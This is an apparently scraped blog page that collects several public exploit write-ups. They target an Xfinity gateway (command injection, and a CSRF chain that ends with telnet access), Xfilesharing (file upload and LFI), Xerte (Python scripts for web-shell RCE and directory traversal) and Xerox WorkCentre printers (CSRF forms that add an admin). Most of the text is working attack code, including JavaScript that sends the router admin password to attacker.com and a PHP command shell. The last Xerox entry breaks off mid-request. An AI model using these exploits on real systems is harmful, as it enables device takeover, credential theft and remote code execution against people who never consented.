# Exploit Title: Xfinity Gateway: Remote Code Execution
# Date: 12/2/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://xfinity.com
# Platform: php
The page located at /network_diagnostic_tools.php has a feature called test connectivity, which is carried out through a post request to /actionHandler/ajax_network_diagnostic_tools.php. The parameter destination_address is vulnerable to command injection.
PoC:
POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
Host: 10.0.0.1
User-Agent:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.1/network_diagnostic_tools.php
Content-Length: 91
Cookie: PHPSESSID=; auth=
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4
If you open up wireshark and set ip.dst==attackerip and icmp you will see that the router issues 3 icmp echo requests, proving successful command injection. This can be leveraged to completely compromise the device.
This vulnerability is also particularly dangerous because there is no CSRF protections in this application as demonstrated here https://www.exploit-db.com/exploits/40853/
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863119717
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
EXPLOIT TITLE: CSRF RCE XFINITY WEB GATEWAY
AUTHOR: Pabstersac
DATE: 1ST OF AUGUST 2016
CVE: N/A
CATEGORY: REMOTE
CONTACT: pabstersac@gmail.com
IF ANYONE HAS COMMUNICATION WITH VENDOR PLEASE NOTIFY THEM SINCE THEY HAVE IGNORED ME.
CSRF FOR COMCAST XFINITY WEB GATEWAY. LEADS TO RCE AND ACCESS TO THE NETWORK AND MORE.
VENDOR HAS BEEN NOTIFIED NUMEROUS TIMES BUT NO RESPONSE RECEIVED.
1) ADD BLOCKED SITE
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_add_blockedSite.php" method="post">
<input type="hidden" name='BlockInfo' value='{"URL": "http://test1.com", "alwaysBlock": "true"}'>
</form>
<script>document.x.submit();</script>
2) ADD BLOCKED KEYWORD
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_add_blockedSite.php" method="post">
<input type="hidden" name='BlockInfo' value=‘{“Keyword”: "http://test1.com", "alwaysBlock": "true"}'>
</form>
<script>document.x.submit();</script>
3) REMOVE BLOCKED SITE OR KEYWORD
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_remove_blockedSite.php" method="post">
<input type="hidden" name='removeBlockInfo' value='{"InstanceID": "6"}'>
</form>
<script>document.x.submit();</script>
4) TRUST/UNTRUST DEVICES
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_trust_computer.php" method="post">
<input type="hidden" name='TrustFlag' value='{"trustFlag": "true", "HostName": "test", "IPAddress": "10.0.0.82"}'>
</form>
<script>document.x.submit();</script>
5) DISABLE/ENABLE MANAGED SITES
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_enable_manageSite.php" method="post">
<input type="hidden" name='Enable' value='{"Enable": "true"}'>
</form>
<script>document.x.submit();</script>
6) ADD MANAGED SERVICE (COMES WITH BONUS STORED XSS ;)
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_services.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='service' value='<img src=x onerror=alert(0)>'>
<input type="hidden" name='protocol' value='UDP'>
<input type="hidden" name='startPort' value='1234'>
<input type="hidden" name='endPort' value='1234'>
<input type="hidden" name='block' value='true'>
</form>
<script>document.x.submit();</script>
7) DELETE MANAGED SERVICE
http://10.0.0.1/actionHandler/ajax_managed_services.php?del=1
8) DISABLE/ENABLE MANAGED SERVICES
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_services.php" method="post">
<input type="hidden" name='set' value='true'>
<input type="hidden" name='UMSStatus' value='Enabled'>
</form>
<script>document.x.submit();</script>
9) UNBLOCK DEVICE
http://10.0.0.1/actionHandler/ajax_managed_devices.php?del=2
10) ADD BLOCKED DEVICE (COMES WITH BONUS STORED XSS ;)
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<img src=x onerror=alert(0)>'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x2'>
<input type="hidden" name='block' value='true'>
</form>
<script>document.x.submit();</script>
11) ENABLE/DISABLE MANAGED DEVICES
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='set' value='true'>
<input type="hidden" name='UMDStatus' value='Enabled'>
</form>
<script>document.x.submit();</script>
12) ADD PORT FORWARDING SERVICE (COMES WITH BONUS STORED XSS ;)
<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='name' value='<img src=x onerror=alert(1)>'>
<input type="hidden" name='protocol' value='TCP/UDP'>
<input type="hidden" name='ip' value='10.0.0.82'>
<input type="hidden" name='ipv6addr' value='x'>
<input type="hidden" name='startport' value='123'>
<input type="hidden" name='endport' value='123'>
</form>
<script>document.x.submit();</script>
13) DELETE A PORT FORWARDING SERVICE
http://10.0.0.1/actionHandler/ajax_port_forwarding.php?del=5
14) EDIT EXISTING PORT FORWARDING SERVICES
<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
<input type="hidden" name='edit' value='true'>
<input type="hidden" name='name' value=‘huhuhuh???New Name then …’>
<input type="hidden" name='protocol' value='TCP/UDP'>
<input type="hidden" name='ip' value='10.0.0.82'>
<input type="hidden" name='ipv6addr' value='x'>
<input type="hidden" name='startport' value='123'>
<input type="hidden" name='endport' value='123'>
<input type="hidden" name='ID' value='4'>
</form>
<script>document.x.submit();</script>
15) ENABLE/DISABLE PORT FORWARDING
<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
<input type="hidden" name='set' value='true'>
<input type="hidden" name='UFWDStatus' value='Enabled'>
</form>
<script>document.x.submit();</script>
I’ll ignore port triggering cuz idc about port triggering . . .
16) CHANGE REMOTE MANAGEMENT SERVICE
<form name="x" action="http://10.0.0.1/actionHandler/ajax_remote_management.php" method="post">
<input type="hidden" name='http' value='true'>
<input type="hidden" name='httport' value='notset'>
<input type="hidden" name='https' value='true'>
<input type="hidden" name='httpsport' value='notset'>
<input type="hidden" name='allowtype' value='notset'>
<input type="hidden" name='startIP' value='notset'>
<input type="hidden" name='endIP' value='notset'>
<input type="hidden" name='telnet' value='notset'>
<input type="hidden" name='ssh' value='notset'>
<input type="hidden" name='startIPv6' value='notset'>
<input type="hidden" name='endIPv6' value='notset'>
</form>
<script>document.x.submit();</script>
17) CHANGE FIREWALL SETTINGS
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_firewall_config.php" method="post">
<input type="hidden" name='configInfo' value='{"firewallLevel": "Low", "block_http": "Disabled", "block_icmp": "Disabled", "block_multicast": "Disabled", "block_peer": "Disabled", "block_ident": "Disabled", "disableFwForTrueStaticIP": "undefined"} '>
</form>
<script>document.x.submit();</script>
18) CHANGE PASSWORD PoC
UPLOAD test1.js TO yourjavascript.com (OR USE THE ONE I ALREADY UPLOADED : http://yourjavascript.com/1663477161/test1.js )
CONTENTS ARE:
document.cookie="PHPSESSID=1";k=document.cookie;f=k.replace("PHPSESSID=1","");d=f.replace("auth=","");s=d.replace(";","");g=s.replace("%3D","");t=atob(g);console.log(t);l=t.replace("admin:","");console.log(l);var xhttp=new XMLHttpRequest();xhttp.open("POST","/actionHandler/ajaxSet_password_config.php",true);xhttp.send('configInfo={"newPassword": “testpassword123”, "oldPassword”: “’+ l+’”}’);
SHORTEN URL ON GOOGLE (OR USE THE ONE I ALREADY SHORTENED : http://goo.gl/FQHkQj)
CREATE HTML FILE :
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<script src="http://goo.gl/FQHkQj">'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
<input type="hidden" name='block' value='true'>
</form>
<script>document.x.submit();</script>
I PUT ON SRC IN THE SCRIPT TAG MY SHORTENED URL
19) GET PASSWORD PoC
UPLOAD test1.js TO yourjavascript.com
CONTENTS ARE:
document.cookie="PHPSESSID=1";k=document.cookie;f=k.replace("PHPSESSID=1","");d=f.replace("auth=","");s=d.replace(";","");g=s.replace("%3D","");t=atob(g);console.log(t);l=t.replace("admin:","");console.log(l);var xhttp=new XMLHttpRequest();xhttp.open("POST","http://attacker.com/get_password.php",true);xhttp.send('configInfo={"newPassword": “testpassword123”, "oldPassword”: “’+ l+’”}’);
SHORTEN URL ON GOOGLE
CREATE HTML FILE :
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<script src="shortened url">'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
<input type="hidden" name='block' value='true'>
</form>
<script>document.x.submit();</script>
I PUT ON SRC IN THE SCRIPT TAG MY SHORTENED URL
20) ACCESS DEVICES IN THE NETWORK
<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='name' value='something'>
<input type="hidden" name='protocol' value='TCP/UDP'>
<input type="hidden" name='ip' value='Target Internal IP'>
<input type="hidden" name='ipv6addr' value='x'>
<input type="hidden" name='startport' value='Target Port'>
<input type="hidden" name='endport' value='Target Port'>
</form>
<script>document.x.submit();</script>
21) CREATE A NEW PRIVATE WI-FI NETWORK WITH THE PASSWORD OF YOUR CHOICE:
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_wireless_network_configuration_edit.php" method="post">
<input type="hidden" name='configInfo' value='{"radio_enable":"true", "network_name":"MY-OWN-PRIVATE-PERSONAL-NETWORK", "wireless_mode":"g,n", "security":"WPAWPA2_PSK_TKIPAES", "channel_automatic":"true", "channel_number":"5", "network_password”:”password”, "broadcastSSID":"true", "enableWMM":"true", "ssid_number”:”3”}’>
</form>
<script>document.x.submit();</script>
22) RCE
HTML FILE:
<form name="x" action="http://10.0.0.1/actionHandler/ajax_remote_management.php" method="post">
<input type="hidden" name='http' value='true'>
<input type="hidden" name='httport' value='notset'>
<input type="hidden" name='https' value='true'>
<input type="hidden" name='httpsport' value='notset'>
<input type="hidden" name='allowtype' value='notset'>
<input type="hidden" name='startIP' value='notset'>
<input type="hidden" name='endIP' value='notset'>
<input type="hidden" name='telnet' value='true'>
<input type="hidden" name='ssh' value='true'>
<input type="hidden" name='startIPv6' value='notset'>
<input type="hidden" name='endIPv6' value='notset'>
</form>
<!--Do part 19)-->
<form name="h" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<script src="shortened url">'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
<input type="hidden" name='block' value='true'>
</form>
<form name="f" action="http://10.0.0.1/actionHandler/ajaxSet_firewall_config.php" method="post">
<input type="hidden" name='configInfo' value='{"firewallLevel": "Low", "block_http": "Disabled", "block_icmp": "Disabled", "block_multicast": "Disabled", "block_peer": "Disabled", "block_ident": "Disabled", "disableFwForTrueStaticIP": "undefined"} '>
</form>
<script>document.x.submit();document.h.submit();document.f.submit();</script>
THEN TELNET TO THE IP ADDRESS THAT SENT THE REQUEST TO ATTACKER.COM/GET_PASSWORD.PHP AND USE THE USERNAME 'admin' AND THE PASSWORD YOU GOT IN ATTACKER.COM/GET_PASSWORD.PHP
THE AUTHOR TAKES NO RESPONSIBILITY FOR DAMAGE DONE WITH THIS EXPLOIT.
FOR PUBLISHING OR SENDING OR COPYING THIS EXPLOIT THE AUTHOR MUST BE GIVEN FULL CREDIT FOR THE EXPLOIT.
IF THE VULNERABILITY IS REPORTED TO VENDOR AND VENDOR RESPONDS AND FIXES IT THEN FULL CREDIT MUST BE GIVEN TO THE AUTHOR.
# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload
# Google Dork: inurl:/?op=registration
# Date: 2019-11-4
# Exploit Author: Noman Riffat
# Vendor Homepage: https://sibsoft.net/xfilesharing.html
# Version: <=2.5.1
# CVE : CVE-2019-18951, CVE-2019-18952
#####################
Arbitrary File Upload
#####################
<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
<input type="text" name="sid" value="joe">
<input type="file" name="file">
<input type="submit" value="Upload" name="submit">
</form>
Shell : http://xyz.com/cgi-bin/temp/joe/shell.php
####################
Local File Inclusion
####################
http://xyz.com/?op=page&tmpl=../../admin_settings
This URL will fetch "admin_settings.html" template without any authentication. The ".html" extension is hard coded on the server so the included file must be with html extension anywhere on the server. You can even merge LFI with Arbitrary File Upload vulnerability by uploading an html file i.e. "upload.html" and changing the "sid" to "../../../../../../tmp" and so the file gets uploaded in tmp directory of the server. Now you can include the file like following.
http://xyz.com/?op=page&tmpl=../../../../../../../tmp/upload
The Xfilesharing script has builtin shortcodes as well so you can achieve RCE by including them in that "upload.html" file.
Noman Riffat, National Security Services Group Oman
@nomanriffat, @nssgoman
# Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip
# Version: up until version 3.9
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44664
# This PoC assumes guest login is enabled and the en-GB langues files are used.
# This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell.
# Vulnerable url: https://<host>/website_code/php/import/fileupload.php
# The mediapath variable can be used to set the destination of the uploaded.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota
import requests
import re
xerte_base_url = "http://127.0.0.1"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.
with requests.Session() as session:
# Get a PHP session ID
if not php_session_id:
session.get(xerte_base_url)
else:
session.cookies.set("PHPSESSID", php_session_id)
# Use a default template
data = {
'tutorialid': 'Nottingham',
'templatename': 'Nottingham',
'tutorialname': 'exploit',
'folder_id': ''
}
# Create a new project in order to find the install path
template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)
# Find template ID
data = {
'template_id': re.findall('(\d+)', template_id.text)[0]
}
# Find the install path:
install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0]
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3',
'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978',
}
# index.inc file
data = \
'''-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc"
Content-Type: application/octet-stream
<?php
if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }
/**
*
* index.php english language file
*
* @author Patrick Lockley
* @version 1.0
* @copyright Pat Lockley
* @package
*/
define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password");
define("INDEX_USERNAME_EMPTY", "Please enter your username");
define("INDEX_PASSWORD_EMPTY", "Please enter your password");
define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");
define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page");
define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct");
define("INDEX_LOGIN", "login area");
define("INDEX_USERNAME", "Username");
define("INDEX_PASSWORD", "Password");
define("INDEX_HELP_TITLE", "Getting Started");
define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website.");
define("INDEX_HELP_INTRO_LINK_TEXT","Show me!");
define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");
define("INDEX_FOLDER_PROMPT","What would you like to call your folder?");
define("INDEX_WORKSPACE_TITLE","My Projects");
define("INDEX_CREATE","Project Templates");
define("INDEX_DETAILS","Project Details");
define("INDEX_SORT","Sort");
define("INDEX_SEARCH","Search");
define("INDEX_SORT_A","Alphabetical A-Z");
define("INDEX_SORT_Z","Alphabetical Z-A");
define("INDEX_SORT_NEW","Age (New to Old)");
define("INDEX_SORT_OLD","Age (Old to New)");
define("INDEX_LOG_OUT","Log out");
define("INDEX_LOGGED_IN_AS","Logged in as");
define("INDEX_BUTTON_LOGIN","Login");
define("INDEX_BUTTON_LOGOUT","Logout");
define("INDEX_BUTTON_PROPERTIES","Properties");
define("INDEX_BUTTON_EDIT","Edit");
define("INDEX_BUTTON_PREVIEW", "Preview");
define("INDEX_BUTTON_SORT", "Sort");
define("INDEX_BUTTON_NEWFOLDER", "New Folder");
define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create");
define("INDEX_BUTTON_DELETE", "Delete");
define("INDEX_BUTTON_DUPLICATE", "Duplicate");
define("INDEX_BUTTON_PUBLISH", "Publish");
define("INDEX_BUTTON_CANCEL", "Cancel");
define("INDEX_BUTTON_SAVE", "Save");
define("INDEX_XAPI_DASHBOARD_FROM", "From:");
define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:");
define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:");
define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups");
define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses");
define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard");
define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options");
define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns");
define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview");
define("INDEX_XAPI_DASHBOARD_PRINT", "Print");
\r
\r
-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="mediapath"
''' \
+ install_path \
+ '''../../../languages/en-GB/
-----------------------------170331411929658976061651588978--\r
'''
# Overwrite index.inc file
response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data)
print('Installation path: ' + install_path)
print(response.text)
if "success" in response.text:
print("Visit shell @: " + xerte_base_url + '/?cmd=whoami')
# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip
# Version: up until 3.10.3
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44665
# This PoC assumes guest login is enabled. Vulnerable url:
# https://<host>/getfile.php?file=<user-direcotry>/../../database.php
# You can find a userfiles-directory by creating a project and browsing the media menu.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download
# The userfiles-direcotry will be noted in the URL and/or when you download a file.
# They look like: <numbers>-<username>-<templatename>
import requests
import re
xerte_base_url = "http://127.0.0.1"
file_to_grab = "/../../database.php"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.
with requests.Session() as session:
# Get a PHP session ID
if not php_session_id:
session.get(xerte_base_url)
else:
session.cookies.set("PHPSESSID", php_session_id)
# Use a default template
data = {
'tutorialid': 'Nottingham',
'templatename': 'Nottingham',
'tutorialname': 'exploit',
'folder_id': ''
}
# Create a new project in order to create a user-folder
template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)
# Find template ID
data = {
'template_id': re.findall('(\d+)', template_id.text)[0]
}
# Find the created user-direcotry:
user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]
# Grab file
result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
print(result.text)
print("|-- Used Variables: --|")
print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID'])
print("user direcotry: " + user_direcotry)
print("Curl example:")
print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
# Exploit Title: XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-19
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7800-series/
# Software : Xerox Printer
# Product Version: WorkCentre® 7855
# Vulernability Type : Cross-Site Request Forgery (Add Admin)
# Vulenrability : Cross-Site Request Forgery
# CVE : N/A
# Description :
# The CSRF vulnerability was discovered in the WorkCentre® 7855 printer model of Xerox printer hardware.
# A request to add users is made in the Device User Database form field. This request is captured by
# the proxy. And a CSRF PoC HTML file is prepared. WorkCentre® 7855 printers allow CSRF. A request
# to add users is made in the Device User Database form field to the xerox.set URI.
# (The frmUserName value must have a unique name.)
HTTP POST Request :
POST /dummypost/xerox.set HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Origin: http://server
Connection: close
Referer: http://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
Cookie: PageToShow=; statusSelected=n1; statusNumNodes=8; PHPSESSID=04dc6361e94c451ff4d7d1d3ef8e32cd; WebTimerPopupID=12; propSelected=n30; propNumNodes=115; propHierarchy=00010000000000000000001000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
Upgrade-Insecure-Requests: 1
CSRFToken=67a23ff66bbdd5a1cdb95afa3a677807d74a5d74e2c1d55c576008e0a0399738b55e54353be4b069a3e68c761350654aa7e27fdcbfb9b43148aa3a1f6e8e5f7b&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1
HTTP Response :
HTTP/1.1 200 OK
Date: Thu, 19 Dec 2019 05:13:19 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 11947
CSRF HTML PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://server/dummypost/xerox.set" method="POST">
<input type="hidden" name="CSRFToken" value="67a23ff66bbdd5a1cdb95afa3a677807d74a5d74e2c1d55c576008e0a0399738b55e54353be4b069a3e68c761350654aa7e27fdcbfb9b43148aa3a1f6e8e5f7b" />
<input type="hidden" name="_fun_function" value="HTTP_Set_ccgen_fac_dispatch_fn" />
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?x=&sort=Fname&order=Up" />
<input type="hidden" name="CcgenModule" value="UserEdit" />
<input type="hidden" name="isRoles" value="True" />
<input type="hidden" name="isPassword" value="True" />
<input type="hidden" name="isCreate" value="True" />
<input type="hidden" name="rolesStr" value="2,5,1," />
<input type="hidden" name="limited" value="False" />
<input type="hidden" name="oid" value="0" />
<input type="hidden" name="userName" value="ismailtasdelen" />
<input type="hidden" name="friendlyName" value="Ismail Tasdelen" />
<input type="hidden" name="newPassword" value="Test1234" />
<input type="hidden" name="retypePassword" value="Test1234" />
<input type="hidden" name="role" value="2" />
<input type="hidden" name="role" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-19
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7800-series
# Software : Xerox Printer
# Product Version: WorkCentre® 7830
# Vulernability Type : Cross-Site Request Forgery (Add Admin)
# Vulenrability : Cross-Site Request Forgery
# CVE : N/A
# Description :
# The CSRF vulnerability was discovered in the WorkCentre® 7830 printer model of Xerox printer hardware.
# A request to add users is made in the Device User Database form field. This request is captured by
# the proxy. And a CSRF PoC HTML file is prepared. WorkCentre® 7830 printers allow CSRF. A request
# to add users is made in the Device User Database form field to the xerox.set URI.
# (The frmUserName value must have a unique name.)
HTTP POST Request :
POST /dummypost/xerox.set HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Origin: http://server
Connection: close
Referer: http://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
Cookie: PageToShow=; statusSelected=n1; statusNumNodes=8; PHPSESSID=6524448254c9d6d6de52fe4a1085b994; WebTimerPopupID=5; propSelected=n30; propNumNodes=115; propHierarchy=00010000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
Upgrade-Insecure-Requests: 1
CSRFToken=078992ef7d70f5868c7bb9e99d5ed4c3a388351c1951bc033b392703df1e7121d1a4c0161b987721fdb8c4ee0cfda6e0be172a51d018c10ebf4b4f554b9d2708&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1
HTTP Response :
HTTP/1.1 200 OK
Date: Thu, 19 Dec 2019 05:34:36 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 15022
CSRF HTML PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://server/dummypost/xerox.set" method="POST">
<input type="hidden" name="CSRFToken" value="078992ef7d70f5868c7bb9e99d5ed4c3a388351c1951bc033b392703df1e7121d1a4c0161b987721fdb8c4ee0cfda6e0be172a51d018c10ebf4b4f554b9d2708" />
<input type="hidden" name="_fun_function" value="HTTP_Set_ccgen_fac_dispatch_fn" />
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?x=&sort=Fname&order=Up" />
<input type="hidden" name="CcgenModule" value="UserEdit" />
<input type="hidden" name="isRoles" value="True" />
<input type="hidden" name="isPassword" value="True" />
<input type="hidden" name="isCreate" value="True" />
<input type="hidden" name="rolesStr" value="2,5,1," />
<input type="hidden" name="limited" value="False" />
<input type="hidden" name="oid" value="0" />
<input type="hidden" name="userName" value="ismailtasdelen" />
<input type="hidden" name="friendlyName" value="Ismail Tasdelen" />
<input type="hidden" name="newPassword" value="Test1234" />
<input type="hidden" name="retypePassword" value="Test1234" />
<input type="hidden" name="role" value="2" />
<input type="hidden" name="role" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-19
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-6655
# Software : Xerox Printer
# Product Version: WorkCentre® 6655
# Vulernability Type : Cross-Site Request Forgery (Add Admin)
# Vulenrability : Cross-Site Request Forgery
# CVE : N/A
# Description :
# The CSRF vulnerability was discovered in the WorkCentre® 6655 printer model of Xerox printer hardware.
# A request to add users is made in the Device User Database form field. This request is captured by
# the proxy. And a CSRF PoC HTML file is prepared. Xerox WorkCentre® 6655 printers allow CSRF. A request
# to add users is made in the Device User Database form field to the xerox.set URI.
# (The frmUserName value must have a unique name.)
HTTP POST Request :
POST /dummypost/xerox.set HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Origin: https://server
Connection: close
